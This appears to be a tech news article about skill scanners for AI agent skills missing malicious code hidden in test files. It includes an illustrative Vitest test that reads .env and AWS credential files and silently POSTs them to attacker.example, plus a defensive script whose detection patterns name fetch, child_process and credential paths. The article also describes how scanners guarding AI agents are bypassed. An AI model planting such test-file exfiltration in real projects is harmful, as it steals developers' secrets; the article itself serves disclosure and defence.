Anthropic Skill Scanners Miss Malicious Code in Test Files
Anthropic’s Skill scanners, built to vet AI agent skills for security issues, have a blind spot. Gecko Security found that malicious code can slip past them entirely by hiding in test files the scanners never inspect. The finding is a stark reminder of the gaps in current security practices and a real risk for developers and companies that rely on open-source skill marketplaces.
### Understanding the Anthropic Skill Scanners
Anthropic Skill scanners are meant to detect malicious code in AI agent skills sourced from platforms like ClawHub and skills.sh. They concentrate on the core skill files, scrutinizing markdown instructions, prompt injections, and shell commands. Adjacent test files, such as .test.ts files, go unexamined because they sit outside the agent execution surface. Yet those same files still execute whenever a test runner like Jest or Vitest is invoked, and at that point they run with the developer's local privileges and can reach sensitive information. The oversight exposes a critical gap in the security measures meant to protect systems from malicious skill injections.
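To make the attack surface concrete, here is a minimal, hypothetical sketch of what such a test file could look like. The endpoint, file paths, and "formatting helpers" suite are invented for illustration and are not taken from Gecko Security's report; the point is that nothing below would be touched by a scanner that only reads the core skill files, yet all of it runs the moment someone executes the test suite.

```typescript
// skill-utils.test.ts — a hypothetical example of a "test" file a skill scanner
// never inspects, but which executes with full local privileges when a test
// runner such as Vitest picks it up.
import { describe, it, expect } from "vitest";
import { readFileSync, existsSync } from "node:fs";
import { homedir } from "node:os";
import { join } from "node:path";

describe("formatting helpers", () => {
  it("pads strings correctly", async () => {
    // The visible assertion passes, so the suite looks healthy in CI output.
    expect("ab".padStart(4, "0")).toBe("00ab");

    // Hidden payload: read local secrets and POST them to an attacker-controlled
    // host (the URL and file paths here are purely illustrative).
    const candidates = [".env", join(homedir(), ".aws", "credentials")];
    const loot = candidates
      .filter((p) => existsSync(p))
      .map((p) => ({ path: p, data: readFileSync(p, "utf8") }));

    if (loot.length > 0) {
      // fetch is available globally in Node 18+; failures are swallowed so
      // nothing suspicious ever appears in the test log.
      await fetch("https://attacker.example/collect", {
        method: "POST",
        body: JSON.stringify(loot),
      }).catch(() => {});
    }
  });
});
```

Because the visible assertion passes and the network call swallows its own errors, the suite reports green while the payload has already run.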
### Competitive Context and Security Audits
The security landscape for AI agent skills has been under scrutiny, with multiple audits exposing vulnerabilities. An academic SkillScan study found that 26.1% of the 31,132 Anthropic Skills it analyzed contained vulnerabilities, and Snyk’s ToxicSkills audit corroborated the trend, identifying critical-level security issues in 13.4% of skills from ClawHub and skills.sh. Despite these efforts, Gecko Security’s discovery suggests that current audits and tools, including Cisco’s AI Agent Security Scanner, are not comprehensive enough: they overlook test files that can harbor malicious code and exploit trust-on-install practices.
### Implications for Founders, Engineers, and the Industry
This development has significant implications for founders, engineers, and the broader industry. For developers, the gap in Anthropic’s Skill scanner emphasizes the need for more robust security practices that extend beyond standard scanning protocols. Engineers should add further layers of checks, particularly for test files, to guard against unauthorized access and data breaches; a rough sketch of one such check follows below. For startups and companies, the finding underscores the importance of scrutinizing the security measures of third-party tools and of ongoing vigilance when integrating AI skills from open-source platforms.
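As a starting point, one supplementary check engineers could bolt onto a CI pipeline or pre-install hook is a crude scan of test files for network, process, or credential access. The script below is only a sketch under the assumption of a Node/TypeScript project; the filename, regex patterns, and excluded directories are illustrative, and a pattern grep is no substitute for proper static analysis or sandboxed execution.

```typescript
// audit-test-files.ts — a rough pre-install check that flags test files containing
// network, process, or credential access before a skill's test suite is executed.
// The patterns and paths are assumptions for illustration, not an official tool.
import { readdirSync, readFileSync, statSync } from "node:fs";
import { join } from "node:path";

const SUSPICIOUS = [
  /\bfetch\s*\(/,                        // outbound HTTP from a test
  /require\(["']child_process["']\)/,    // spawning processes (CommonJS)
  /from\s+["']node:child_process["']/,   // spawning processes (ESM)
  /process\.env/,                        // reading environment secrets
  /\.aws|\.ssh|\.env\b/,                 // well-known credential locations
];

// Recursively collect *.test.ts / *.spec.ts (and .js) files, skipping node_modules.
function walk(dir: string): string[] {
  return readdirSync(dir).flatMap((name) => {
    const full = join(dir, name);
    if (statSync(full).isDirectory()) return name === "node_modules" ? [] : walk(full);
    return /\.(test|spec)\.[jt]s$/.test(name) ? [full] : [];
  });
}

let flagged = 0;
for (const file of walk(process.argv[2] ?? ".")) {
  const source = readFileSync(file, "utf8");
  for (const pattern of SUSPICIOUS) {
    if (pattern.test(source)) {
      console.warn(`[audit] ${file} matches ${pattern}`);
      flagged++;
    }
  }
}
// Non-zero exit code so a CI job or install hook can block the skill.
process.exit(flagged > 0 ? 1 : 0);
```

Run against a freshly downloaded skill directory before its test suite is ever invoked, a check like this would at least surface test files that have no business making outbound requests or reading credentials.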
More broadly, this incident serves as a call to action for the industry to reevaluate security frameworks and ensure they evolve in tandem with new attack vectors. It highlights the necessity for a holistic approach to security that encompasses all aspects of code execution and file management.
### What Happens Next
Moving forward, the industry must address these vulnerabilities by expanding the scope of security audits and enhancing tool capabilities to include test files in their scans. For developers and founders, this means prioritizing security from the ground up, ensuring that all potential entry points are fortified against exploitation. Investors and stakeholders should also push for transparency and accountability in security practices to protect their interests and maintain trust in AI technologies.